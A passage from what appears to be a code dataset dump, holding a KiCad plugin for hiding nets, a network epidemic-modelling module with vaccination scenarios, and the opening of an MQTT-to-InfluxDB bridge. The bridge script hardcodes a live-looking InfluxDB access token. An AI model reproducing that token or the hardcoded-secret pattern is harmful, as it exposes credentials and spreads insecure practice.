flag=wx.ALL | wx.ALIGN_CENTER)\n btn_sizer.AddSpacer(WIDGET_SPACING)\n btn_sizer.Add(self.cancel_btn, flag=wx.ALL | wx.ALIGN_CENTER)\n btn_sizer.AddSpacer(WIDGET_SPACING)\n\n # Create a vertical sizer to hold everything in the panel.\n sizer = wx.BoxSizer(wx.VERTICAL)\n sizer.Add(self.name_field, 0, wx.ALL | wx.EXPAND, WIDGET_SPACING)\n sizer.Add(btn_sizer, 0, wx.ALL | wx.ALIGN_CENTER, WIDGET_SPACING)\n\n # Size the panel.\n panel.SetSizer(sizer)\n panel.Layout()\n panel.Fit()\n\n # Finally, size the frame that holds the panel.\n self.Fit()\n\n # Show the dialog box.\n self.ShowModal()\n\n def set_net_name(self, evt):\n self.netlist = self.name_field.GetList()\n self.Close()\n\n def cancel(self, evt):\n self.netlist = list()\n self.Close()\n\n def GetList(self):\n return self.netlist\n\n\n\n\ndef hide_net_callback(evt):\n \"\"\"Hide a Net.\"\"\"\n allnets=get_net_names()\n allnets.remove('')\n net_names = NetNameDialog(\n title=\"Attach Pads to New or Existing Net\",\n tool_tip=\"Type or select name for the net to connect these pads.\",\n net_name_choices=allnets,\n edit=False,\n )\n\n for netname in net_names.GetList():\n brd = GetBoard()\n cnct = brd.GetConnectivity()\n for pad in brd.GetPads():\n if pad.GetNetname() == netname:\n cnct.Remove(pad)\n pad.SetNetCode(0)\n hidden_nets.append(netname)\n\n # Update the board to show the removed connections.\n brd.BuildListOfNets()\n cnct.RecalculateRatsnest()\n Refresh()\n\n\ndef show_net_callback(evt):\n \"\"\"Show a previously hidden net.\"\"\"\n if len(hidden_nets) <= 0:\n return\n\n net_names = NetNameDialog(\n title=\"Attach Pads to New or Existing Net\",\n tool_tip=\"Type or select name for the net to connect these pads.\",\n net_name_choices=hidden_nets,\n edit=False,\n )\n\n for netname in net_names.GetList():\n # Get the selected pads.\n brd = GetBoard()\n cnct = brd.GetConnectivity()\n for pad in brd.GetPads():\n pad_key = pad.GetParent().GetReference(), pad.GetPadName()\n if original_netlist[pad_key][0] == netname:\n cnct.Add(pad)\n pad.SetNetCode(original_netlist[pad_key][1])\n hidden_nets.remove(netname)\n\n # Update the board to show the removed connections.\n brd.BuildListOfNets()\n cnct.RecalculateRatsnest()\n Refresh()\n\n\ndef show_all_nets_callback(evt):\n \"\"\"Show all hidden Nets.\"\"\"\n if len(hidden_nets) <= 0:\n return\n\n # Get the selected pads.\n brd = GetBoard()\n cnct = brd.GetConnectivity()\n for pad in brd.GetPads():\n pad_key = pad.GetParent().GetReference(), pad.GetPadName()\n if original_netlist[pad_key][0] in hidden_nets:\n cnct.Add(pad)\n pad.SetNetCode(original_netlist[pad_key][1])\n\n # Update the board to show the removed connections.\n brd.BuildListOfNets()\n cnct.RecalculateRatsnest()\n Refresh()\n hidden_nets.clear()\n\n\n\n\n\nclass ShowHideNets(ActionPlugin):\n \"\"\"Plugin class for tools to change wiring between pads\"\"\"\n\n buttons = False # Buttons currently not installed in toolbar.\n\n def defaults(self):\n self.name = \"ShowHideNets\"\n self.category = \"Layout\"\n self.description = \"Show/Hide complete nets/airwires.\"\n self.icon_file_name = os.path.join(os.path.dirname(__file__), 'show_hide_net.png')\n\n def Run(self):\n\n # Add Wire-It buttons to toolbar if they aren't there already.\n if not self.buttons:\n\n def findPcbnewWindow():\n \"\"\"Find the window for the PCBNEW application.\"\"\"\n windows = wx.GetTopLevelWindows()\n pcbnew = [w for w in windows if \"Pcbnew\" in w.GetTitle()]\n if len(pcbnew) != 1:\n raise Exception(\"Cannot find pcbnew window from title matching!\")\n return pcbnew[0]\n\n try:\n # Find the toolbar in the PCBNEW window.\n import inspect\n import os\n\n filename = inspect.getframeinfo(inspect.currentframe()).filename\n path = os.path.dirname(os.path.abspath(filename))\n pcbwin = findPcbnewWindow()\n top_toolbar = pcbwin.FindWindowById(ID_H_TOOLBAR+1)\n\n # Add wire-creation button to toolbar.\n hide_button = wx.NewId()\n hide_button_bm = wx.Bitmap(\n os.path.join(os.path.dirname(__file__), \"hide.png\"),\n wx.BITMAP_TYPE_PNG,\n )\n top_toolbar.AddTool(\n hide_button,\n \"Hide\",\n hide_button_bm,\n \"Hide a Net\",\n wx.ITEM_NORMAL,\n )\n top_toolbar.Bind(wx.EVT_TOOL, hide_net_callback, id=hide_button)\n\n # Add wire-removal button.\n show_button = wx.NewId()\n show_button_bm = wx.Bitmap(\n os.path.join(os.path.dirname(__file__), \"show.png\"), wx.BITMAP_TYPE_PNG\n )\n top_toolbar.AddTool(\n show_button,\n \"Show Net\",\n show_button_bm,\n \"Show a previously hidden net\",\n wx.ITEM_NORMAL,\n )\n top_toolbar.Bind(wx.EVT_TOOL, show_net_callback, id=show_button)\n\n # Add pad-swap button.\n show_all_button = wx.NewId()\n show_all_button_bm = wx.Bitmap(\n os.path.join(os.path.dirname(__file__),\"show_all.png\"),\n wx.BITMAP_TYPE_PNG,\n )\n top_toolbar.AddTool(\n show_all_button,\n \"Show all Nets\",\n show_all_button_bm,\n \"Show all hidden Nets\",\n wx.ITEM_NORMAL,\n )\n top_toolbar.Bind(wx.EVT_TOOL, show_all_nets_callback, id=show_all_button)\n\n top_toolbar.Realize()\n\n self.buttons = True # Buttons now installed in toolbar.\n\n # Also, store the current netlist to compare against later when dumping wiring changes.\n global original_netlist\n original_netlist = get_netlist()\n\n except Exception as e:\n debug_dialog(\"Something went wrong!\", e)\n\n","repo_name":"alterratz/ShowHideNets","sub_path":"ShowHideNets.py","file_name":"ShowHideNets.py","file_ext":"py","file_size_in_byte":8891,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"5497198961","text":"import math\nimport numpy as np\nfrom src import gen_extinct_prob, manatee\n\n\"\"\"\nFor use, call compute_phase_space from outside file with associated parameters to obtain and save\nmatrix files of the s,m phase space for each generation specified.\n\"\"\"\n\ndef compute_extinct_prob_all(deg_dist=None, T=1.0, n_gens=20, renorm=True, fft = True, custom_g0=None, custom_g1=None):\n if deg_dist is not None:\n psi = Psi(deg_dist, initProb=1, num_gens=n_gens, max_s=len(deg_dist), max_m=len(deg_dist), initial_T=T)\n else:\n psi = Psi(deg_dist, initProb=1, num_gens=n_gens, initial_T=T, custom_g0=custom_g0, custom_g1=custom_g1,\n max_m=len(custom_g1), max_s=len(custom_g1))\n# =============================================================================\n# for g in range(n_gens):\n# psi[g][:,0] = np.zeros(psi.shape[0])\n# psi[g] = psi[g]/np.sum(psi[g])\n# =============================================================================\n if renorm:\n for g in range(n_gens):\n for s in range(psi.shape[1]):\n if np.sum(psi[g][s][:]) > 0:\n psi[g][s,0] = 0\n psi[g][s,:] = psi[g][s,:] / np.sum(psi[g][s,:])\n if deg_dist is None:\n deg_dist = custom_g1 # this is just for computing the extinction prob\n extct_array = gen_extinct_prob.gen_ext_prob_array(psi, deg_dist, T, fft=fft, custom=True)\n else:\n extct_array = gen_extinct_prob.gen_ext_prob_array(psi, deg_dist, T, fft=fft)\n return [extct_array, psi]\n\ndef expected_num_infected(deg_dist, T):\n d_len = len(deg_dist)\n psi = Psi(deg_dist, initProb=1, num_gens=50, max_s=d_len, max_m=d_len, initial_T=T)\n expected_cum_array = np.zeros(50)\n for gen in range(50):\n psi[gen][:,0] = np.zeros(d_len)\n psi[gen] = psi[gen]/np.sum(psi[gen])\n inverted_s_m = psi[gen]\n ps_g_analytical = np.sum(inverted_s_m, axis=0)\n ps_g_analytical = ps_g_analytical / np.sum(ps_g_analytical)\n expected_cum_array[gen] = np.sum(ps_g_analytical * np.arange(len(ps_g_analytical)))\n np.savetxt(f'./../data/expected_cum_{T}_m.txt', expected_cum_array)\n print(expected_cum_array[:10])\n\n# CALL FROM OUTSIDE CLASS CALLS HERE\ndef compute_phase_space(num_gens, num_nodes, degree_distribution, transmissibility,\n save_results=True, gens_to_save=None,\n file_fmt_to_save='phase_space/generation_{0}', intervention_gen=-1, intervention_trans=None,\n vacc_pop=.5, rollout_dict=None,\n do_non_interv=True, do_interv=True, intervention_type=\"none\", pre_vax_correction=False):\n \"\"\"\n Computes and saves a matrix for each generation of the s,m phase space\n :param num_gens: Number of generations to compute til\n :param num_nodes: Number of nodes in the network. Should match the length of the passed degree_distribution\n :param degree_distribution: Vector or list of length num_nodes.\n :param transmissibility: Original transmission paramter T\n :param save_results: boolean, will save files to directory and format in file_fmt_to_save. Must specify dyamic arg param for generation, {0}.\n :param gens_to_save: Which generations to save a file for\n :param file_fmt_to_save: Directory and file name pattern, with arg for gen number, such as my_files/generation_{0}\n :param intervention_gen: FOR SINGLE, UNIVERSAL INTERVENTION ONLY: Generation of intervention\n :param intervention_trans: FOR SINGLE, UNIVERSAL INTERVENTION ONLY: Transmissiblity change at intervention\n :param vacc_pop: FOR SINGLE, UNIVERSAL INTERVENTION ONLY: population vaccinated at intervention\n :param rollout_dict: Non-cumulative dict of generations and their vaccination percentages, e.g. {3: .05, 4: .01, 5:.02}\n :param do_non_interv: boolean. Will run non-intervention case on same degree distribution and transmissibility.\n :param do_interv: boolean. Will run intervention model.\n :param intervention_type: string. Specify universal, random_rollout, or targeted_rollout\n :param pre_vax_correction: IGNORE, DO NOT USE\n :return:\n \"\"\"\n # the generating function for psi gen g (prob of having s infected by the end of gen g of which m became infected during gen g\n initProb = 1\n\n if do_non_interv:\n all_psi_results = Psi(degree_distribution, initProb, num_gens, num_nodes, num_nodes, transmissibility)\n\n if save_results:\n try:\n for gen in gens_to_save:\n if gen < num_gens:\n np.savetxt(file_fmt_to_save.format(gen) + '.txt', all_psi_results[gen], delimiter=',')\n except Exception:\n print('Must provide gens_to_save in arguments as list')\n else:\n all_psi_results = np.zeros((2, 2))\n\n if do_interv:\n all_psi_results_with_intervention = Psi(degree_distribution, initProb, num_gens, num_nodes, num_nodes,\n transmissibility, intervention_gen, intervention_trans, vacc_pop,\n rollout_dict, intervention_type, pre_vax_correction=pre_vax_correction)\n if save_results:\n try:\n for gen in gens_to_save:\n np.savetxt(file_fmt_to_save.format(gen) + '_intv.txt', all_psi_results_with_intervention[gen],\n delimiter=',')\n except Exception:\n print('Must provide gens_to_save in arguments as list')\n else:\n all_psi_results_with_intervention = np.zeros((2, 2))\n return all_psi_results, all_psi_results_with_intervention\n\n\ndef pdf_of(degree_list):\n if np.sum(degree_list) == 0:\n return np.array(degree_list)\n g0 = np.zeros(len(degree_list))\n for i in range(len(g0)):\n g0[i] = degree_list[i] / np.sum(degree_list)\n return g0\n\n\ndef z1_of(g_0):\n z1 = 0\n for k in range(len(g_0)):\n z1 += (k * g_0[k])\n return z1\n\n\ndef g1_of(g_0):\n g_1 = np.zeros(len(g_0))\n for k in range(len(g_0) - 1):\n g_1[k] = (k + 1) * g_0[k + 1]\n if np.sum(g_0) == 0:\n return g_1\n return g_1 / (z1_of(g_0))\n\ndef g_g_of(g_gminus1, deltas, g): # Different derivation than the g1_of function since we need to incorporate the deltas.\n g_g = np.zeros(len(g_gminus1))\n denom = np.zeros(len(g_gminus1))\n\n for k in range(len(g_gminus1) - 1):\n g_g[k] = k * (k+1) * (1 - deltas[g][k+1]) * g_gminus1[k + 1]\n denom[k] = (k + 1) * (1 - deltas[g][k+1]) * g_gminus1[k + 1]\n if np.sum(denom) == 0:\n return g_g\n return g_g / np.sum(denom)\n\n\n\ndef phase_space(g_0, g_1, g=10):\n Psi_sm = np.zeros((10, 100, 100))\n # Initial condition:\n Psi_sm[0][1][1] = 1\n return Psi_sm\n\n\ndef gen_functions_with_transmissibility(degree_distrb, T):\n # Given a degree distribution for G0 (or the degree distribution of the entire network).\n # Given transmissibility T\n maxk = len(degree_distrb)\n p_k = degree_distrb\n\n # This is the matrix of k x l resulting p l given k in each cell\n p_LK = np.zeros((maxk, maxk))\n\n # Generates pgf in variable l as probabilities of infection of l neighbors given the original degree distribution and transmission prob T\n for k in range(0, maxk):\n # somewhere here have another matrix that's l by j\n # construct that for each p_j_given_l (whatever the order is)\n for l in range(0, k + 1):\n try:\n # this will be some operation of this with the vector for the particular l\n # sum over all j for this particular l\n p_LgivenK = p_k[k] * (\n math.gamma(k + 1) / (math.gamma(l + 1) * math.gamma(k - l + 1)) * T ** (l) * (1 - T) ** (k - l))\n p_LK[k][l] = p_LgivenK\n except OverflowError:\n p_LK[k][l] = 0\n p_l = np.sum(p_LK, axis=0)\n if np.sum(p_l) != 0:\n p_l = p_l / (np.sum(p_l))\n\n G0_with_T = pdf_of(p_l)\n G1_with_T = g1_of(G0_with_T)\n return G1_with_T, G0_with_T\n\n\ndef critical_degree_calc(prop, degree_d, delta_k, g): # This function is the change\n k_crit = len(degree_d) #default for the critical k value\n temp_prop = prop\n while temp_prop > 0:\n temp_prop = temp_prop - degree_d[k_crit-1]\n delta_k[g][k_crit-1] = 1.0\n k_crit -= 1\n\n delta_k[g][k_crit] = (-temp_prop) * degree_d[k_crit]\n\n return k_crit, -temp_prop, delta_k\n\ndef constructMatrixM(g_0, g_1):\n # Constructs the matrix of pgfs for G0_with transmission convolved to every mth power\n N_0 = len(g_0)\n N_1 = len(g_1)\n M_0 = np.zeros((N_0, N_0))\n M_1 = np.zeros((N_1, N_1))\n\n M_0[1] = g_0\n newDist = g_1\n M_1[1] = newDist\n for row in range(2, N_1):\n second_convol = convolve_with_ifft(newDist, g_1)\n M_1[row] = second_convol\n newDist = M_1[row]\n\n M_1[0][0] = 1 #nice\n return (M_0, M_1)\n\n\ndef computeLittlePsi(s, m, prevGenPsi, M):\n s_prime = s - m\n newPsi = prevGenPsi[s_prime, :].dot(M[:, m])\n return newPsi\n\ndef offspring_dists(r0, k, p0, length):\n a = 1/k\n g1 = np.zeros(length)\n g0 = np.zeros(length)\n for i in range(len(g1)):\n try:\n # fact = np.sqrt(2 * math.pi * i) * (i / np.exp(1)) ** i\n g1[i] = (math.gamma(i + k) / (math.factorial(i) * math.gamma(k))) * ((a * r0) / (1 + a * r0)) ** (i) * (\n 1 / (1 + a * r0)) ** (k)\n except OverflowError:\n g1[i] = 0\n g1 = g1 / np.sum(g1)\n g0 = compute_g0_from_offspring(g1, p0)\n g0 = g0[:-1]\n return g0, g1\n\ndef compute_g0_from_offspring(g1, p0):\n g0 = np.zeros(len(g1)+1)\n for i in range(1, len(g0)):\n g0[i] = g1[i-1]/i\n g0 = g0 / np.sum(g0)\n g0[0] = p0\n g0[1:] = g0[1:]*(1-p0)\n return g0\n\n\n\n# COMPUTATION STARTS HERE\ndef Psi(degree_distrb=None, initProb=1, num_gens=400, max_s=400, max_m=400, initial_T=0.8,\n intervention_gen=-1, intervention_T=0.5,\n prop_vacc=0.5, rollout_dict=None, intervention_type=\"none\",\n custom_g0=None, custom_g1=None, pre_vax_correction=False):\n # 3-d matrix with one matrix per generation of Psi_g\n allPsi = np.zeros(((num_gens, max_s, max_m)))\n allPsi[0][1][1] = initProb\n\n # Assign initial degree distribution here\n if custom_g0 is None and custom_g1 is None:\n original_degree_distrb = degree_distrb\n g1, g0 = gen_functions_with_transmissibility(original_degree_distrb,\n initial_T) # this g0 and g1 is for the G(1-(xy+1)T) in terms of the l's\n elif custom_g0 is None or custom_g1 is None:\n print('PLEASE PROVIDE BOTH CUSTOM G1 AND CUSTOM G0')\n else:\n g0 = custom_g0 # Custom g0 and g1 set if using a distribution for secondary cases (such as a negative binomial) and not the original network degree distribution\n g1 = custom_g1\n\n M_0, M_1 = constructMatrixM(g0, g1)\n\n if intervention_type==\"none\":\n allPsi = baseline(num_gens, max_s, max_m, allPsi, M_1, M_0)\n\n if intervention_type==\"universal\":\n allPsi = universal_intervention(num_gens, max_s, max_m, original_degree_distrb, intervention_gen, intervention_T, initial_T, allPsi, g0, M_1, M_0, pre_vax_correction)\n\n elif intervention_type==\"random_rollout\":\n allPsi = random_rollout_intervention(num_gens, max_s, max_m, original_degree_distrb, initial_T, allPsi, g0, M_1, M_0, rollout_dict, pre_vax_correction)\n\n elif intervention_type==\"random\":\n print('PLEASE USE RANDOM ROLLOUT')\n # allPsi = random_intervention(num_gens, max_s, max_m, original_degree_distrb, intervention_gen, prop_vacc, initial_T, allPsi, g0, M_1, M_0, pre_vax_correction)\n\n elif intervention_type==\"targeted\":\n print('PLEASE USE TARGETED ROLLOUT')\n # allPsi = targeted_intervention(num_gens, max_s, max_m, original_degree_distrb, intervention_gen, prop_vacc, initial_T, allPsi, g0, M_1, M_0, pre_vax_correction)\n\n elif intervention_type==\"targeted_rollout\":\n allPsi = targeted_rollout_intervention(num_gens, max_s, max_m, original_degree_distrb, initial_T, allPsi, g0, M_1, M_0, rollout_dict, pre_vax_correction)\n\n else:\n print(f\"Specified an unrecognized intervention type of {intervention_type}, please specify one of universal, random, targeted, random_rollout or targeted_rollout\")\n\n return allPsi\n\ndef baseline(num_gens, max_s, max_m, allPsi, M_1, M_0):\n for g in range(1, num_gens):\n M = M_1\n if g == 1:\n M = M_0\n print('working on gen ' + str(g))\n for s in range(max_s):\n for m in range(0, s):\n allPsi[g][s][m] = computeLittlePsi(s, m, allPsi[g - 1], M)\n psi_g = allPsi[g]\n psi_g = psi_g / np.sum(psi_g)\n allPsi[g] = psi_g\n return allPsi\n\ndef universal_intervention(num_gens, max_s, max_m, original_degree_distrb, intervention_gen, intervention_T, initial_T, allPsi, g0, M_1, M_0, pre_vax_correction):\n for g in range(1, num_gens):\n if pre_vax_correction:\n if g < intervention_gen:\n # Re-compute T_g based on beta, gamma, g, v, and g_int\n beta_1 = .5 # TODO is it ok that this is arbitrary? Ans: Yes.\n gamma_1 = (beta_1 - beta_1 * initial_T) / initial_T\n q_1 = z1_of(g1_of(original_degree_distrb))\n beta_2 = .5\n gamma_2 = (beta_2 - beta_2 * intervention_T) / intervention_T\n\n T_g_i = T_pre_vax_fancy_2(beta_1=beta_1, beta_2=beta_2, gamma_1=gamma_1, gamma_2=gamma_2, q_1=q_1, gen_i=intervention_gen-g,\n v=1) #should v be 1 or 0?\n # Use new T_g to compute: new secondary degree distributions with T G(x;T):\n g1_T, g0_T = gen_functions_with_transmissibility(original_degree_distrb, T_g_i)\n # new T_g)\n # Re-compute M0 and M1 from new g1, g0\n M_0_g, M_1_g = constructMatrixM(g0_T, g1_T)\n M = M_1_g\n if g == 1:\n M = M_0_g\n else:\n if g < intervention_gen:\n M = M_1\n if g == 1:\n M = M_0\n print('working on gen ' + str(g))\n if g == intervention_gen:\n new_T = intervention_T\n new_g1, new_g0 = gen_functions_with_transmissibility(original_degree_distrb, new_T)\n new_M = constructMatrixM(g0, new_g1)\n M_1 = new_M[1]\n M = M_1\n if g == 1:\n M = M_0\n for s in range(max_s):\n for m in range(max_m):\n allPsi[g][s][m] = computeLittlePsi(s, m, allPsi[g - 1], M)\n psi_g = allPsi[g]\n psi_g = psi_g / np.sum(psi_g)\n allPsi[g] = psi_g\n return allPsi\n\n\ndef random_rollout_intervention(num_gens, max_s, max_m, original_degree_distrb, initial_T, allPsi, g0, M_1, M_0,\n rollout_dict, pre_vax_correction):\n intervention_gen_keys = list(rollout_dict.keys())\n inter_list = [0]\n inter_list.extend(intervention_gen_keys)\n beta = 0.8\n gamma = (beta - beta*initial_T) / initial_T\n q_1 = z1_of(g1_of(original_degree_distrb))\n v_rollout_cumu = [0]\n v_rollout_cumu.extend(np.cumsum(list(rollout_dict.values())))\n vacc_vector = np.zeros(num_gens)\n for i in range(num_gens):\n if i in inter_list and i!=0:\n vacc_vector[i] = rollout_dict[i]+vacc_vector[i-1]\n else:\n vacc_vector[i] = vacc_vector[i-1]\n\n for g in range(1, num_gens):\n # change num_gens to a big big number in computation and then see what the plot looks like\n T_g = manatee.t_of_g(betas=np.full(num_gens, beta), gammas=np.full(num_gens, gamma), qs=np.full(num_gens, q_1),\n vaccs=vacc_vector, g=g)\n print(g, T_g) # this makes sense\n g1_T, g0_T = gen_functions_with_transmissibility(original_degree_distrb, T_g) # changing it to modify the new G1 with the new Tg?\n M_0_g, M_1_g = constructMatrixM(g0_T, g1_T) # this now might be wiping away the changes made with the random vax dist\n M = M_1_g\n\n if g == 1:\n M = M_0\n for s in range(max_s):\n for m in range(max_m):\n allPsi[g][s][m] = computeLittlePsi(s, m, allPsi[g - 1], M)\n psi_g = allPsi[g]\n psi_g = psi_g / np.sum(psi_g) # normalize\n allPsi[g] = psi_g\n\n return allPsi\n\ndef modify_g0(G0, k_crit, replacement):\n G0_x = np.zeros((len(G0)))\n for k in range(0, k_crit):\n G0_x[k] = G0[k]\n G0_x[k_crit] = replacement\n if np.sum(G0_x) > 0:\n G0_x = G0_x/np.sum(G0_x)\n return G0_x\n\n\n\ndef targeted_rollout_intervention(num_gens, max_s, max_m, original_degree_distrb,\n initial_T, allPsi, g0, M_1, M_0, rollout_dict,\n pre_vax_correction):\n # First, need to create and find H, q and T for each generation g in the rollout:\n intervention_gen_keys = list(rollout_dict.keys())\n inter_list = [0]\n inter_list.extend(intervention_gen_keys)\n v_rollout_cumu = [0]\n v_rollout_cumu.extend(np.cumsum(list(rollout_dict.values())))\n vacc_vector = np.zeros(num_gens)\n for i in range(num_gens):\n if i in inter_list and i!=0:\n vacc_vector[i] = rollout_dict[i]+vacc_vector[i-1]\n else:\n vacc_vector[i] = vacc_vector[i-1]\n beta = 0.8 # arbitrary, via choice of initial_T\n gamma = (beta - beta*initial_T) / initial_T\n maxk = len(original_degree_distrb)\n g1_orig = g1_of(original_degree_distrb)\n origin_q = np.sum([k*g1_orig[k] for k in range(len(g1_orig))])\n dynamic_q = np.zeros((num_gens))\n first_gen_inter = intervention_gen_keys[0]\n dynamic_q[:first_gen_inter] = origin_q\n dynamic_H = np.zeros((num_gens))\n store_Ggs = np.zeros((maxk, maxk))\n store_G0s = np.zeros((maxk, maxk))\n store_Ggs[:first_gen_inter] = g1_orig\n store_G0s[:first_gen_inter] = original_degree_distrb\n delta_g_k = np.zeros((num_gens,maxk))\n\n ##### finding the q's and H's for each intervention:\n for gen, V in rollout_dict.items():\n print(vacc_vector[gen])\n crit_value, replace_prob, delta_g_k = critical_degree_calc(vacc_vector[gen], original_degree_distrb, delta_g_k, gen) # check if original makes sense\n print(crit_value)\n #H = np.sum([(k) * original_degree_distrb[k] for k in range(crit_value, len(original_degree_distrb))])\\\n # /np.sum([(k) * original_degree_distrb[k] for k in range(0, len(original_degree_distrb))])\n H_g = np.sum([(k+1) * delta_g_k[gen][k] * original_degree_distrb[k+1] for k in range(0, len(original_degree_distrb)-1)]) /np.sum([(k+1) * original_degree_distrb[k+1] for k in range(0, len(original_degree_distrb)-1)])\n print(f'H:{H_g}')\n mod_G0_H = modify_g0(original_degree_distrb, crit_value, replace_prob)\n print(mod_G0_H)\n mod_Gg_H = g_g_of(mod_G0_H, delta_g_k, gen)\n store_Ggs[gen:] = mod_Gg_H\n store_G0s[gen:] = mod_G0_H\n q_g = (1-H_g)* np.sum(mod_Gg_H) #changed to the sum since the derivations are different for normalizing\n if np.isnan(q_g):\n q_g = 0\n print(q_g)\n dynamic_q[gen:] = q_g\n dynamic_H[gen:] = H_g\n\n ######\n\n for g in range(1, num_gens):\n T_g = manatee.t_of_g(betas=np.full(num_gens, beta), gammas=np.full(num_gens, gamma), qs=dynamic_q,\n vaccs=dynamic_H, g=g)\n print(g, T_g)\n g0_x = store_G0s[g]\n g1_T, g0_T = gen_functions_with_transmissibility(g0_x, T_g)\n M_0_g, M_1_g = constructMatrixM(g0_T, g1_T)\n M = M_1_g\n\n if g == 1:\n M = M_0\n for s in range(max_s):\n for m in range(max_m):\n allPsi[g][s][m] = computeLittlePsi(s, m, allPsi[g - 1], M)\n psi_g = allPsi[g]\n psi_g = psi_g / np.sum(psi_g)\n allPsi[g] = psi_g\n\n return allPsi\n\ndef T_pre_vax(beta_1, beta_2, gamma_1, gamma_2, q_1, gen_i, v):\n T_gen_i = beta_1 / (beta_1 + gamma_1 + ((q_1*beta_1) / gen_i)) \\\n + (((q_1*beta_1) / gen_i) / (beta_1 + gamma_1 + ((q_1*beta_1) / gen_i))\n * (beta_2/ (beta_2+gamma_2)) * (1-v))\n return T_gen_i\n\ndef T_pre_vax_fancy_2(beta_1, beta_2, gamma_1, gamma_2, q_1, gen_i, v):\n T_gen_i = beta_1 / (beta_1 + gamma_1 + ((q_1*beta_1) / (gen_i - .5))) \\\n + (((q_1*beta_1) / (gen_i - .5)) / (beta_1 + gamma_1 + ((q_1*beta_1) / (gen_i-0.5)))\n * (beta_2/ (beta_2+gamma_2)) * (1-v))\n return T_gen_i\n\ndef T_pre_vax_rollout(beta_1, beta_2, gamma_1, gamma_2, q_1, current_g, rollout_dict):\n T_modified = 0\n vax_prop_cum = 0\n for g in rollout_dict.keys():\n vax_prop_cum += rollout_dict[g]\n i_w = g - current_g\n if (T_modified == 0) and (g > current_g): #i.e. first term has not been added yet, and found next soonest intervention, then add 1st term:\n T_modified += beta_1 / (beta_1+gamma_1 + (q_1*beta_1/i_w))\n if g > current_g:\n T_modified += ((beta_1 * (1-vax_prop_cum)) / (beta_1 + gamma_1 + (q_1*beta_1/(i_w)))) * ((q_1*beta_1/i_w)/(beta_1+gamma_1+(q_1*beta_1/i_w)))\n return T_modified\n\n\ndef T_pre_vax_fancy(beta_1, beta_2, gamma_1, gamma_2, q_1, gen_i, v):\n term_1 = -math.e ** (-1 * gamma_1 * gen_i /(q_1 * beta_1)) + ((gamma_1/(beta_1+gamma_1))*math.e**(-(beta_1+gamma_1)*gen_i/(q_1*beta_1))) + (beta_1/(beta_1+gamma_1))\n term_2 = math.e ** (-gamma_2*gen_i/(q_1*beta_1)) - ((gamma_2/(gamma_2+beta_2)) * math.e**(-(beta_2+gamma_2)*gen_i/(q_1*beta_1)))\n T_gen_i = term_1 + (1-v) * term_2\n return T_gen_i\n\n\n\n# Convolution code below:\n# Used in methods generating the phase space pgf's\n# The phase space formalism needs\n# 1) Need the G_{g-1} formalism (This includes the double sum formula) **DONE\n# 2) Need to put together the matrix that Andrea is drawing,\n# this matrix will have rows of PGFs, each row is a exponentiated G_{g-1}\n# 3) Convolve the rows of this matrix to get one value associated with [G_{g-1}]^m'\n# 4) The value from the convolution will then lead to the Psi matrix\n\n# This is the convolution code\n\n\ndef find_pairs(m, len_dist_1, len_dist_2):\n ### must have all three args nat num valued\n ### must be that m <= len_dist_1 + len_dist_2\n pairs = []\n if (m <= len_dist_1 and m <= len_dist_2):\n for i in np.arange(0, m + 1, 1):\n pairs.append([i, m - i])\n elif (m <= len_dist_1 and m > len_dist_2):\n for i in np.arange(m - len_dist_2, m + 1, 1):\n pairs.append([i, m - i])\n elif (m > len_dist_1 and m <= len_dist_2):\n for i in np.arange(0, len_dist_1 + 1, 1):\n pairs.append([i, m - i])\n else:\n for i in np.arange(m - len_dist_2, len_dist_1 + 1, 1):\n pairs.append([i, m - i])\n return pairs\n\n\ndef convolve_dists(X, Y, static_length=None):\n ### X and Y should be vectors of probabilities (For our problem we need to incorporate the G0 and G1 probabilities in here.)\n ### each giving a distribution on a finite subset of the naturals\n if static_length is None:\n len_X = len(X)\n len_Y = len(Y)\n elif static_length is not None:\n len_X = static_length\n len_Y = static_length\n new_dist_len = len_X + len_Y - 1 # Don't think it has to be this long\n new_dist_len = len_X\n new_dist = np.zeros(new_dist_len)\n for m in np.arange(new_dist_len):\n new_prob = 0\n pairs = find_pairs(m, len_X - 1, len_Y - 1)\n for l_pair in pairs:\n new_prob = new_prob + X[l_pair[0]] * Y[l_pair[1]]\n new_dist[m] = new_prob\n return new_dist\n\ndef convolve_with_ifft(firstdist, seconddist):\n result_length = len(firstdist)\n\n # Copy each array into a 2d array of the appropriate shape.\n rows = np.zeros((2, result_length))\n for i, array in enumerate([firstdist, seconddist]):\n rows[i, :len(array)] = array\n\n # Transform, take the product, and do the inverse transform\n # to get the convolution.\n fft_of_rows = np.fft.fft(rows)\n fft_of_convolution = fft_of_rows.prod(axis=0)\n convolution = np.fft.ifft(fft_of_convolution)\n\n # Assuming real inputs, the imaginary part of the output can\n # be ignored.\n return convolution.real\n\n\ndef generating_function_metrics(gen_func_g0, gen_func_g1):\n # Placeholder function for computing outbreak size and other metrics on generating functions\n G1_func = gen_func_g1\n #\n G1_func[1] = G1_func[1] - 1\n #\n fun = np.poly1d(np.flip(gen_func_g1))\n roots = np.roots(fun)\n u = roots[(roots > 0) & (roots < 1)]\n\n # Outbreak size, What is going on here with the imaginary numbers\n if len(u) == 0:\n S = 1\n else:\n S = 1 - np.polyval(np.flip(gen_func_g0), u[1])\n print(S)\n","repo_name":"andrea-allen/pgf-networks","sub_path":"src/pgf_formalism.py","file_name":"pgf_formalism.py","file_ext":"py","file_size_in_byte":24911,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"44"} +{"seq_id":"33055385378","text":"import paho.mqtt.client as mqtt\nfrom KafkaUtils import *\nimport time\nimport time\nimport pandas as pd\nimport json\nimport paho.mqtt.client as mqtt\nfrom datetime import datetime\nfrom typing import NamedTuple\nimport time\nfrom influxdb_client import InfluxDBClient, Point, WritePrecision\nfrom influxdb_client.client.write_api import SYNCHRONOUS\n\n\nTOKEN = \"Fdh-kOfYFmROa9moZQeprDTKfP20WRIk8ZKbrYeyTVkc_DViQyOm0fRW-hBoY6nN3Q83D7BlCiW30AlYivL6KA==\"\nORG = \"UIUC\"\nBUCKET = \"MSAdata\"\nHOST=\"localhost\"\nMQTT_PORT=1883\nINFLUXDB_CLIENT = InfluxDBClient(url=\"http://localhost:8086\", token=TOKEN)\nwrite_api = INFLUXDB_CLIENT.write_api(write_options=SYNCHRONOUS)\nmqtt_broker='192.168.250.51' # or 192.168.250.51\nmqtt_client=mqtt.Client('MQTTBridge')\nmqtt_client.connect(mqtt_broker)\nMQTT_TOPIC = [(f\"dvpg/msa/tower/1/height/1000/sonic\", 0), 